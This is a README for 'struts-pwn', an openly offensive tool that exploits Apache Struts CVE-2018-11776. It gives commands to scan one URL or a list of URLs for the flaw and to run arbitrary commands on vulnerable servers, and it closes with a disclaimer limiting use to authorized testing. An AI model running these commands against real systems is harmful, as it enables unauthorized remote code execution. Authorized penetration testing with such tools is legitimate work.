struts-pwn_CVE-2018-11776 icon indicating copy to clipboard operation
struts-pwn_CVE-2018-11776 copied to clipboard

An exploit for Apache Struts CVE-2018-11776

struts-pwn - CVE-2018-11776 Exploit

An exploit for Apache Struts CVE-2018-11776

Usage

Check if the vulnerability exists against a single URL.

python struts-pwn.py --url 'http://example.com/demo/struts2-showcase/index.action'

Check if the vulnerability exists against a list of URLs.

python struts-pwn.py --list 'urls.txt'

Exploit a single URL.

python struts-pwn.py --exploit --url 'http://example.com/demo/struts2-showcase/index.action' -c 'id'

Exploit a list of URLs.

python struts-pwn.py --exploit --list 'urls.txt' -c 'id'

Demo

Demo

Screenshot 1

Screenshot 2

Requirements

  • Python2 or Python3
  • requests

Legal Disclaimer

This project is made for educational and ethical testing purposes only. Usage of struts-pwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

License

The project is licensed under MIT License.

Author

Mazin Ahmed